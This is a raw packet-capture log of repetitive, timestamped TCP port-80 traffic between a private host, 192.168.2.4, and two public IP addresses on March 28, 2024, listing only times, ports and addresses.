Mar 28, 2024 09:15:00.226005077 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.226056099 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.227016926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227032900 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227047920 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227116108 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227116108 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227122068 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227179050 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227206945 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227230072 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227293015 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227322102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227329969 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227341890 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227364063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227385044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227400064 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227440119 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227454901 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227473021 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227474928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227483988 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227514029 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227536917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227550983 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227576017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227596998 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227597952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227649927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227657080 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227679014 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227704048 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227711916 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227729082 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227735996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227760077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227771997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227771997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227797031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227828979 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227833986 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227852106 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227859974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227880001 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227885008 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227915049 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227921963 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227942944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.227967978 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227976084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.227994919 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228007078 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228046894 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.228054047 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.228059053 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228082895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228087902 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228087902 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.228100061 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228116035 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.228116035 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228151083 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228157997 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228171110 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228178024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228180885 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228198051 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228204966 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228225946 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228250980 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228257895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228280067 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228283882 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228292942 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228307009 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228331089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228338957 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228363037 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228368044 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228393078 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228432894 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228440046 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228451967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228460073 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228461027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228478909 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228517056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228526115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228538990 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228544950 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228552103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228571892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228576899 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228601933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228622913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228637934 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228658915 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228688955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228720903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228750944 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228806019 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228818893 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228837013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228874922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228898048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228919029 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228923082 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228933096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228955984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.228975058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.228992939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229022026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229033947 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229043007 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229051113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229069948 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229079962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229114056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229118109 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229161024 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229161024 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229202032 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229217052 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229258060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229264021 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229274035 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229336023 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229342937 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229355097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229363918 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229377031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229404926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229430914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229453087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229480028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229511023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229516029 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229557037 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229572058 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229588032 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229644060 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229656935 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229718924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229799986 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229821920 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.229866982 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.229937077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230030060 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230055094 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230084896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230139017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230160952 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230163097 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230206013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230226040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230226994 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230247021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230262995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230281115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230293036 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230302095 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230357885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230365992 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230377913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230386019 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230401993 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230437994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230444908 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230464935 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230489016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230495930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230506897 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230515957 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230524063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230541945 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230556011 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230575085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230592012 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230612993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230632067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230633974 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230659008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230669022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230681896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230683088 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230711937 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230724096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230732918 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230778933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230786085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230806112 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230838060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230853081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230859995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230860949 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230892897 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230900049 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230906963 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230906963 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230921984 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230930090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230950117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230969906 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.230988026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.230995893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231029987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231064081 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231072903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231081009 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231101990 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231117010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231122017 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231125116 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231131077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231167078 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231179953 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231189013 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231203079 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231228113 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231244087 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231256008 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231297970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231317997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231342077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231363058 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231383085 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231408119 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231415987 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231436014 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231443882 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231478930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231492043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231499910 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231530905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231530905 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231534958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231586933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231630087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231678009 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231693983 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231702089 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231718063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231718063 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231760025 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231760025 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231775999 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231784105 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231807947 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231822014 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231841087 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231873035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231880903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231904984 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231905937 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.231930971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.231931925 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.231973886 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.231986046 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.231993914 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.231998920 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.232002020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232023954 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.232027054 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.232043028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232068062 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232074976 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232081890 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232099056 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232112885 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232153893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232176065 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232227087 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232243061 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232280970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232316971 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232319117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232325077 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232367992 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232389927 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232436895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232450962 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232492924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232517004 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232537985 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232578039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232601881 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232604980 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232650995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232671022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232683897 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232721090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232739925 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232741117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232762098 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232800007 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232806921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232817888 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232856035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232877016 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232877016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232901096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232920885 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232940912 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.232954025 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232963085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.232980013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233005047 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233015060 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233037949 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233074903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233093977 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233135939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233165026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233186007 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233217001 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233230114 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233236074 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233293056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233325958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233346939 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233395100 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233412981 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233421087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233439922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233475924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233489037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233504057 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233516932 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233555079 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233576059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233596087 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233618975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233625889 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233635902 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233697891 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233704090 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.233705997 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233711958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.233737946 CET	80	49734	195.20.16.46	192.168.2.4
